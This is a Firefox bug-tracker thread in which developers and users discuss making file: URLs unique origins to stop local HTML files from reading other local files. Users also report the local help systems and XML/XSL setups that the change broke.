Treating file: URIs as unique origins
Categories
(Core :: DOM: Security, enhancement, P3)
Tracking
()
People
(Reporter: ckerschb, Assigned: baku)
References
(Regressed 1 open bug)
Details
(Whiteboard: [domsecurity-backlog1])
Attachments
(1 file, 2 obsolete files)
(deleted),
application/x-zip-compressed
|
Details |
Reporter | ||
Updated•6 years ago
|
Updated•5 years ago
|
Comment 1•5 years ago
|
||
I don't think we can just get rid of NS_RelaxStrictFileOriginPolicy (the nsNetUtil.cpp link above) because it's now also used from https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/dom/workers/WorkerLoadInfo.cpp#288 to decide which "same origin" scripts could be loaded. Might be able to rethink the scope for that, but meanwhile it appears to be good enough to simply remove the call to NS_RelaxStrictFileOriginPolicy from ContentPrincipal.cpp
That is, delete https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/caps/ContentPrincipal.cpp#328-336
Comment 2•5 years ago
|
||
Are there edge cases you can think of, bz? Is there navigational inheritance we need to worry about?
Comment 3•5 years ago
|
||
Or since it's evening the day before a US holiday, maybe baku can answer when he gets up in a few hours
Updated•5 years ago
|
Comment 4•5 years ago
|
||
Comment 5•5 years ago
|
||
Depends on D36854
Updated•5 years ago
|
Comment 6•5 years ago
|
||
The navigational inheritance bits are at https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/dom/base/nsContentUtils.cpp#6508 which calls nsIPrincipal::CheckMayLoad and will land in ContentPrincipal::MayLoadInternal, which is exactly the bit comment 2 is removing. So if we remove that bit we should just remove all of https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/dom/base/nsContentUtils.cpp#6499-6511
I don't think we can really keep the navigation inheritance bits working if we actually want to prevent things like "load the other file in an iframe and then read it", at least for a bunch of file formats....
Assignee | ||
Comment 7•5 years ago
|
||
I don't think we can just get rid of NS_RelaxStrictFileOriginPolicy (the nsNetUtil.cpp link above) because it's now also used from https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/dom/workers/WorkerLoadInfo.cpp#288
If we treat file: URLs are unique origins, we can simplify that code and remove NS_RelaxStrictFileOriginPolicy from WorkerLoadInfo too.
The only way a file: URL script can create a worker is to load itself as a worker.. any other file: URL will be considered cross-origin.
Comment 8•5 years ago
|
||
(In reply to Andrea Marchesini [:baku] from comment #7)
The only way a file: URL script can create a worker is to load itself as a worker.. any other file: URL will be considered cross-origin.
That might break a bunch of tests and local development. Should we do something else there to special-case loading file: workers from file: documents?
Comment 9•5 years ago
|
||
(In reply to Boris Zbarsky [:bzbarsky, bz on IRC] from comment #6)
So if we remove that bit we should just remove all of https://searchfox.org/mozilla-central/rev/11712bd3ce7454923e5931fa92eaf9c01ef35a0a/dom/base/nsContentUtils.cpp#6499-6511
My current removal preserves the security.fileuri.strict_origin_policy=false case, buried in the call to nsScriptSecurityManager::SecurityCompareURIs just above the bit I removed. A bunch of tests seem to use that. Not sure I'm ready to break that case, especially since that was going to be my recommendation to anyone we break who's depending on the current behavior.
I don't think we can really keep the navigation inheritance bits working if we actually want to prevent things like "load the other file in an iframe and then read it", at least for a bunch of file formats....
I definitely don't want to keep that working, just wanted to make sure I wasn't missing a chunk of code if it was implemented using different checks.
Assignee | ||
Comment 10•5 years ago
|
||
That might break a bunch of tests and local development. Should we do something else there to special-case loading file: workers from file: documents?
I don't think so. Mainly for 2 reasons:
. local development in these days is done via a local web server.
. this change will align firefox to chrome and safari
Comment 11•5 years ago
|
||
In that case we'll want to just remove NS_RelaxStrictFileOriginPolicy entirely.
Updated•5 years ago
|
Comment 12•5 years ago
|
||
Chrome has –allow-file-access-from-files
command line option. I want a similar escape hatch.
Comment 13•5 years ago
|
||
especially since that was going to be my recommendation to anyone we break who's depending on the current behavior
Setting security.fileuri.strict_origin_policy
to false
is a lot more dangerous than the current behavior... I'd be pretty loath to recommend it to anyone in good conscience.
Updated•5 years ago
|
Comment 14•5 years ago
|
||
The strict file: URL origin policy in this bug-fix breaks desktop apps across the board that use font-awesome via local resources. I imagine there are a huge number of Bootstrap apps that are now broken on FireFox.
Comment 15•5 years ago
|
||
As a vendor for local help systems, we strongly urge consideration for allowing font-awesome resources to be loaded without having to disable the 'privacy_file_unique_origin' default preference. I have attached this simple example use case.
Thank you,
Comment 16•5 years ago
|
||
Tony, I filed bug 1566172 to track that. Thank you for reporting it!
Comment 17•5 years ago
|
||
Actually, looks like bug 1565942 tracked that already, so probably best to follow along there for the specific file:// issue.
Comment 18•5 years ago
|
||
Fixed in Firefox 68 by the patch in bug 1558299, https://hg.mozilla.org/mozilla-central/rev/2ad059cc9e78
Updated•5 years ago
|
Updated•5 years ago
|
Comment 19•5 years ago
|
||
potentially allowing uploads of user sensitive data to an attacker controlled server
Why don't we only block that part? It sounds more clever that current solution that will break the help system or xml+xsl that lie on cdrom everywhere.
Does someone investigate the claim that people store all downloads in the same dir? I'm not sure of that. Not sure at all.
So is there really a need?
Comment 20•5 years ago
|
||
Why don't we only block that part?
Because blocking data exfiltration is hard.
Does someone investigate the claim that people store all downloads in the same dir?
That's the default behavior of all browsers: downloads go in the user Downloads directory. So yes, this claim is true for the vast majority of people. Keep in mind that "downloads" includes things you open in a helper app, by the way.
Comment 21•5 years ago
|
||
Do you really have html in your download dir ?
In my download dir I only got zip pdf and maybe exe I explicitly choose to download.
Html are in my cache and I won't click any html in my cache.
Why don't apply the unique uri rule to the download dir only?
Comment 22•5 years ago
|
||
Or allow an extension to trap the unique uri violation for file:// protocol and propose to launch a local server for the directory
Comment 23•4 years ago
|
||
Does any way to display local xml file with local xslt without
Setting security.fileuri.strict_origin_policy to false
?
Chrome has the same issue so i don't know correct way how to display local xml inside web browser.
Comment 24•4 years ago
|
||
@ null:)
You can't.
Chrome then Firefox decided this pose a security threat.
Your only option is to host your xml + xsl on a server.
Or use IE
Description
•